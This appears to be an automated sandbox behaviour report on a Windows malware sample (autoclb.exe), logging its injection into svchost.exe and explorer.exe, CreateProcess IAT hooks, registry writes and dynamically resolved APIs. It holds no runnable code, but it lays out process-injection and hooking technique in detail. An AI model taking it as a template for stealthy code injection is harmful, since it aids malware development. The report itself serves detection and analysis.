Open c:\windows\explorer.exe desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE True 1
Fn
Thread (6)
»
Operation Process Additional Information Success Count Logfile
Suspend c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x2d0 True 1
Fn
Get Context c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x2d0 True 2
Fn
Set Context c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x2d0 True 1
Fn
Resume c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe os_tid = 0x2d0 True 2
Fn
Memory (4)
»
Operation Process Additional Information Success Count Logfile
Protect C:\Windows\system32\svchost.exe address = 0x7ff7ce3a3440, protection = PAGE_EXECUTE_READWRITE, size = 32175608 True 1
Fn
Protect C:\Windows\system32\svchost.exe address = 0x7ff7ce3a3000, protection = PAGE_EXECUTE_READ, size = 32175608 True 1
Fn
Write C:\Windows\system32\svchost.exe address = 0x950000, size = 792 True 1
Fn
Data
Write C:\Windows\system32\svchost.exe address = 0x7ff7ce3a3440, size = 4 True 1
Fn
Data
Module (45)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe base_address = 0x400000 True 2
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x766f0000 True 2
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x779b0000 True 17
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x74d70000 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x74d896e0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetWindowThreadProcessId, address_out = 0x7670ba70 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Wow64EnableWow64FsRedirection, address_out = 0x74dab6a0 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwWow64QueryInformationProcess64, address_out = 0x77a1a840 True 15
Fn
Get Address c:\windows\syswow64\ntdll.dll function = ZwWow64ReadVirtualMemory64, address_out = 0x77a1a860 True 1
Fn
Create Mapping - protection = PAGE_EXECUTE_READWRITE, maximum_size = 32175576 True 1
Fn
Map - process_name = c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2720000 True 1
Fn
Map - process_name = C:\Windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x810000 True 1
Fn
Window (2)
»
Operation Window Name Additional Information Success Count Logfile
Find - class_name = ProgMan True 2
Fn
System (15)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = LHNIWSJ True 1
Fn
Sleep duration = 500 milliseconds (0.500 seconds) True 10
Fn
Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Get Time type = Ticks, time = 102515 True 1
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System False 1
Fn
Process #11: svchost.exe
314 0
»
Information Value
ID #11
File Name c:\windows\system32\svchost.exe
Command Line C:\Windows\system32\svchost.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:26, Reason: Child Process
Unmonitor End Time: 00:03:29, Reason: Self Terminated
Monitor Duration 00:00:03
OS Process Information
»
Information Value
PID 0x198
Parent PID 0x51c (c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username LHNIWSJ\CIiHmnxMn6Ps
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 1C4
0x B44
0x B28
0x B34
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000810000 0x00810000 0x00942fff Pagefile Backed Memory rwx True False False -
private_0x0000000000950000 0x00950000 0x00950fff Private Memory rwx True False False -
private_0x000000007f67f000 0x7f67f000 0x7f67ffff Private Memory rw True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
private_0x000000b093810000 0xb093810000 0xb09382ffff Private Memory rw True False False -
pagefile_0x000000b093810000 0xb093810000 0xb09381ffff Pagefile Backed Memory rw True False False -
svchost.exe.mui 0xb093820000 0xb093820fff Memory Mapped File r False False False -
pagefile_0x000000b093830000 0xb093830000 0xb093843fff Pagefile Backed Memory r True False False -
private_0x000000b093850000 0xb093850000 0xb0938cffff Private Memory rw True False False -
pagefile_0x000000b0938d0000 0xb0938d0000 0xb0938d3fff Pagefile Backed Memory r True False False -
pagefile_0x000000b0938e0000 0xb0938e0000 0xb0938e0fff Pagefile Backed Memory r True False False -
private_0x000000b0938f0000 0xb0938f0000 0xb0938f1fff Private Memory rw True False False -
locale.nls 0xb093900000 0xb0939bdfff Memory Mapped File r False False False -
imm32.dll 0xb0939c0000 0xb0939f3fff Memory Mapped File r False False False -
private_0x000000b0939c0000 0xb0939c0000 0xb0939c0fff Private Memory rw True False False -
private_0x000000b0939d0000 0xb0939d0000 0xb0939d0fff Private Memory rw True False False -
msvfw32.dll.mui 0xb0939e0000 0xb0939e1fff Memory Mapped File r False False False -
private_0x000000b093a00000 0xb093a00000 0xb093a06fff Private Memory rw True False False -
private_0x000000b093a10000 0xb093a10000 0xb093a8ffff Private Memory rw True False False -
private_0x000000b093b00000 0xb093b00000 0xb093bfffff Private Memory rw True False False -
private_0x000000b093c00000 0xb093c00000 0xb093cacfff Private Memory rw True False False -
private_0x000000b093cb0000 0xb093cb0000 0xb093eaffff Private Memory rw True False False -
private_0x000000b093d00000 0xb093d00000 0xb093dfffff Private Memory rw True False False -
pagefile_0x000000b093e00000 0xb093e00000 0xb093f87fff Pagefile Backed Memory r True False False -
pagefile_0x000000b093f90000 0xb093f90000 0xb094110fff Pagefile Backed Memory r True False False -
pagefile_0x000000b094120000 0xb094120000 0xb09551ffff Pagefile Backed Memory r True False False -
private_0x000000b095520000 0xb095520000 0xb0956ccfff Private Memory rw True False False -
oleaut32.dll 0xb095520000 0xb0955dcfff Memory Mapped File r False False False -
pagefile_0x000000b095520000 0xb095520000 0xb095652fff Pagefile Backed Memory rwx True False False -
private_0x000000b0956c0000 0xb0956c0000 0xb0956ccfff Private Memory rw True False False -
private_0x000000b0956d0000 0xb0956d0000 0xb0958cffff Private Memory rw True False False -
private_0x000000b095700000 0xb095700000 0xb0957fffff Private Memory rw True False False -
private_0x000000b095800000 0xb095800000 0xb0959acfff Private Memory rw True False False -
private_0x000000b0959b0000 0xb0959b0000 0xb095baffff Private Memory rw True False False -
private_0x000000b095a00000 0xb095a00000 0xb095afffff Private Memory rw True False False -
private_0x000000b095b00000 0xb095b00000 0xb095cfffff Private Memory rw True False False -
private_0x000000b095b00000 0xb095b00000 0xb095bfffff Private Memory rw True False False -
private_0x000000b095c00000 0xb095c00000 0xb095dfffff Private Memory rw True False False -
private_0x000000b095c00000 0xb095c00000 0xb095cfffff Private Memory rw True False False -
private_0x000000b095d00000 0xb095d00000 0xb095efffff Private Memory rw True False False -
private_0x000000b095d00000 0xb095d00000 0xb095dfffff Private Memory rw True False False -
sortdefault.nls 0xb095e00000 0xb096136fff Memory Mapped File r False False False -
pagefile_0x00007df5ffe50000 0x7df5ffe50000 0x7ff5ffe4ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff7ce270000 0x7ff7ce270000 0x7ff7ce36ffff Pagefile Backed Memory r True False False -
pagefile_0x00007ff7ce370000 0x7ff7ce370000 0x7ff7ce392fff Pagefile Backed Memory r True False False -
private_0x00007ff7ce39b000 0x7ff7ce39b000 0x7ff7ce39cfff Private Memory rw True False False -
private_0x00007ff7ce39d000 0x7ff7ce39d000 0x7ff7ce39dfff Private Memory rw True False False -
private_0x00007ff7ce39e000 0x7ff7ce39e000 0x7ff7ce39ffff Private Memory rw True False False -
svchost.exe 0x7ff7ce3a0000 0x7ff7ce3acfff Memory Mapped File rwx False False False -
winmmbase.dll 0x7ff968780000 0x7ff9687abfff Memory Mapped File rwx False False False -
winmm.dll 0x7ff9687b0000 0x7ff9687d2fff Memory Mapped File rwx False False False -
comctl32.dll 0x7ff96c9b0000 0x7ff96ca59fff Memory Mapped File rwx False False False -
msvfw32.dll 0x7ff96f280000 0x7ff96f2a8fff Memory Mapped File rwx False False False -
msacm32.dll 0x7ff972240000 0x7ff97225bfff Memory Mapped File rwx False False False -
avifil32.dll 0x7ff972350000 0x7ff97236ffff Memory Mapped File rwx False False False -
devobj.dll 0x7ff973450000 0x7ff973476fff Memory Mapped File rwx False False False -
sspicli.dll 0x7ff974520000 0x7ff97454bfff Memory Mapped File rwx False False False -
profapi.dll 0x7ff974980000 0x7ff974992fff Memory Mapped File rwx False False False -
kernel.appcore.dll 0x7ff9749a0000 0x7ff9749aefff Memory Mapped File rwx False False False -
powrprof.dll 0x7ff9749b0000 0x7ff9749f9fff Memory Mapped File rwx False False False -
windows.storage.dll 0x7ff974c30000 0x7ff975257fff Memory Mapped File rwx False False False -
shcore.dll 0x7ff975310000 0x7ff9753c2fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7ff9753d0000 0x7ff9755acfff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x7ff9755b0000 0x7ff9755f3fff Memory Mapped File rwx False False False -
user32.dll 0x7ff9757b0000 0x7ff9758fdfff Memory Mapped File rwx False False False -
shell32.dll 0x7ff975900000 0x7ff976e24fff Memory Mapped File rwx False False False -
advapi32.dll 0x7ff976f80000 0x7ff977025fff Memory Mapped File rwx False False False -
msctf.dll 0x7ff977200000 0x7ff97735bfff Memory Mapped File rwx False False False -
shlwapi.dll 0x7ff977360000 0x7ff9773b0fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7ff9773c0000 0x7ff97745cfff Memory Mapped File rwx False False False -
gdi32.dll 0x7ff9774c0000 0x7ff977644fff Memory Mapped File rwx False False False -
sechost.dll 0x7ff9776c0000 0x7ff97771afff Memory Mapped File rwx False False False -
imm32.dll 0x7ff977720000 0x7ff977755fff Memory Mapped File rwx False False False -
psapi.dll 0x7ff977820000 0x7ff977827fff Memory Mapped File rwx False False False -
combase.dll 0x7ff977830000 0x7ff977aabfff Memory Mapped File rwx False False False -
kernel32.dll 0x7ff977ab0000 0x7ff977b5cfff Memory Mapped File rwx False False False -
ole32.dll 0x7ff977b60000 0x7ff977ca0fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x7ff977df0000 0x7ff977f15fff Memory Mapped File rwx False False False -
ntdll.dll 0x7ff977f30000 0x7ff9780f1fff Memory Mapped File rwx False False False -
Hook Information
»
Type Installer Target Size Information Actions
Code pagefile_0x0000000000810000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x1fe 8 bytes -
...
Code pagefile_0x0000000000810000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x1f8 2 bytes -
...
Code pagefile_0x0000000000810000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x20c 8 bytes -
...
Code pagefile_0x0000000000810000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x206 2 bytes -
...
Code pagefile_0x0000000000810000:+0x28dce kernel32.dll:AslpImageRvaToVa+0x21a 8 bytes -
...
Code pagefile_0x0000000000810000:+0x28dd2 kernel32.dll:AslpImageRvaToVa+0x214 2 bytes -
...
Code pagefile_0x0000000000810000:+0x28dce advapi32.dll:Wow64RedirectKeyPathInternal+0x3fa 8 bytes -
...
Code pagefile_0x0000000000810000:+0x28dd2 advapi32.dll:Wow64RedirectKeyPathInternal+0x3f4 2 bytes -
...
IAT pagefile_0x0000000000810000:+0x289b5 230. entry of user32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
...
IAT pagefile_0x0000000000810000:+0x289b5 517. entry of ole32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
...
IAT pagefile_0x0000000000810000:+0x289b5 638. entry of shell32.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000000810000:+0x318ec
...
IAT pagefile_0x0000000000810000:+0x289b5 631. entry of shell32.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
...
IAT pagefile_0x0000000000810000:+0x289b5 236. entry of windows.storage.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
...
IAT pagefile_0x0000000000810000:+0x289b5 215. entry of windows.storage.dll 4 bytes kernel32.dll:CreateProcessAsUserW+0x0 now points to pagefile_0x0000000000810000:+0x318ec
...
IAT pagefile_0x0000000000810000:+0x289b5 261. entry of msctf.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
...
IAT pagefile_0x0000000000810000:+0x289b5 133. entry of msvcrt.dll 4 bytes kernel32.dll:CreateProcessA+0x0 now points to pagefile_0x0000000000810000:+0x316b8
...
IAT pagefile_0x0000000000810000:+0x289b5 134. entry of msvcrt.dll 4 bytes kernel32.dll:CreateProcessW+0x0 now points to pagefile_0x0000000000810000:+0x315b0
...
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #10: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x2d0 address = 0x810000, size = 1257472 True 1
Fn
Modify Memory #10: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x2d0 address = 0x950000, size = 792 True 1
Fn
Data
Modify Control Flow #10: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x2d0 os_tid = 0x1c4, address = 0xce39d000 True 1
Fn
Modify Memory #10: c:\users\ciihmnxmn6ps\appdata\roaming\adsldraw\autoclb.exe 0x2d0 address = 0x7ff7ce3a3440, size = 4 True 1
Fn
Data
Host Behavior
File (6)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\SYSTEM32\ntdll.dll desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 3
Fn
Read C:\Windows\SYSTEM32\ntdll.dll size = 4, size_out = 4 True 3
Fn
Data
Registry (12)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Ini, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, data = 232, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductID, data = 48 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = 87 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = CurrentVersion, data = 54 True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = InstallDate, data = 65 True 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Scr, type = REG_NONE False 1
Fn
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, size = 40, type = REG_BINARY True 1
Fn
Data
Process (35)
»
Operation Process Additional Information Success Count Logfile
Get Info c:\windows\system32\svchost.exe type = PROCESS_BASIC_INFORMATION True 34
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE True 1
Fn
Thread (7)
»
Operation Process Additional Information Success Count Logfile
Create c:\windows\explorer.exe proc_address = 0x7ff977f39fa0, proc_parameter = 0, flags = THREAD_CREATE_SUSPENDED True 1
Fn
Suspend c:\windows\explorer.exe os_tid = 0xb40 True 1
Fn
Get Context c:\windows\explorer.exe os_tid = 0xb40 True 2
Fn
Set Context c:\windows\explorer.exe os_tid = 0xb40 True 1
Fn
Resume c:\windows\explorer.exe os_tid = 0xb40 True 2
Fn
Memory (9)
»
Operation Process Additional Information Success Count Logfile
Allocate c:\windows\explorer.exe address = 0xb0938ced80, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 758389730696 True 1
Fn
Protect c:\windows\explorer.exe address = 0x7ff977f39fa0, protection = PAGE_EXECUTE_READWRITE, size = 4 True 2
Fn
Protect c:\windows\explorer.exe address = 0x7ff977f39fa0, protection = PAGE_EXECUTE_READ, size = 4 True 2
Fn
Read c:\windows\explorer.exe address = 0x7ff977f39fa0, size = 4 True 1
Fn
Data
Write c:\windows\explorer.exe address = 0x7ff977f39fa0, size = 4 True 2
Fn
Data
Write c:\windows\explorer.exe address = 0x4760000, size = 792 True 1
Fn
Data
Module (227)
»
Operation Module Additional Information Success Count Logfile
Load ntdll.dll base_address = 0x0 True 1
Fn
Load KERNEL32.dll base_address = 0x0 True 1
Fn
Load AVIFIL32.dll base_address = 0x0 True 1
Fn
Load ADVAPI32.dll base_address = 0x7ff976f80000 True 1
Fn
Load SHLWAPI.dll base_address = 0x7ff977360000 True 1
Fn
Load USER32.dll base_address = 0x7ff9757b0000 True 1
Fn
Load PSAPI.DLL base_address = 0x7ff977820000 True 1
Fn
Get Handle c:\windows\system32\svchost.exe base_address = 0x7ff7ce3a0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff977ab0000 True 5
Fn
Get Handle c:\windows\system32\ntdll.dll base_address = 0x7ff977f30000 True 4
Fn
Get Handle c:\windows\system32\kernelbase.dll base_address = 0x7ff9753d0000 True 1
Fn
Get Handle c:\windows\system32\advapi32.dll base_address = 0x7ff976f80000 True 2
Fn
Get Filename AVIFIL32.dll process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\system32\svchost.exe, size = 260 True 2
Fn
Get Filename c:\windows\system32\ntdll.dll process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Windows\SYSTEM32\ntdll.dll, size = 260 True 3
Fn
Get Address - function = NtCreateSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = NtUnmapViewOfSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = NtMapViewOfSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwOpenProcessToken, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwClose, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwQueryInformationToken, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwOpenProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = NtQuerySystemInformation, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlNtStatusToDosError, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwQueryInformationProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlImageDirectoryEntryToData, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _wcsupr, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _strupr, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = memmove, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = bsearch, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _vsnwprintf, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _strlwr, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = atoi, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = strstr, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = wcscpy, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ZwQueryKey, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlUpcaseUnicodeString, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlFreeUnicodeString, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = sprintf, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = _snprintf, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = memset, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = memcpy, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = strcpy, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlAdjustPrivilege, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = mbstowcs, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RtlImageNtHeader, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = memcmp, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = __C_specific_handler, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = __chkstk, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetLocalTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = OpenProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualQueryEx, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateRemoteThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetModuleFileNameW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetVersion, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetEndOfFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RemoveDirectoryW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetTempFileNameA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = DeleteCriticalSection, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CloseHandle, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WriteProcessMemory, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateFileA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcmpiA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetModuleFileNameA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetCurrentProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcmpA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetModuleHandleA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateFileMappingA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = MapViewOfFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = Sleep, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GlobalLock, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrlenA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GlobalAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GlobalUnlock, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcpyA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetLastError, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapFree, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = RemoveDirectoryA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = DeleteFileA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcatA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WriteFile, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateDirectoryA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapDestroy, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapCreate, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetEvent, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = HeapReAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetTickCount, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindNextFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CopyFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SetWaitableTimer, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LocalAlloc, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetCurrentThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetCurrentThreadId, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrlenW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetSystemTimeAsFileTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateEventA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetWindowsDirectoryA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = DeleteFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateDirectoryW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateWaitableTimerA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetTempPathA, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FindFirstFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = LocalFree, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = TerminateProcess, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SuspendThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = WaitForMultipleObjects, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ResumeThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcpyW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = FileTimeToSystemTime, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateFileW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ResetEvent, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = SwitchToThread, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = lstrcatW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = CreateProcessW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetFileSize, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = GetFileAttributesW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
Get Address - function = ExpandEnvironmentStringsW, ordinal = 0, address_out = 0xb0938cfbf0 True 1
Fn
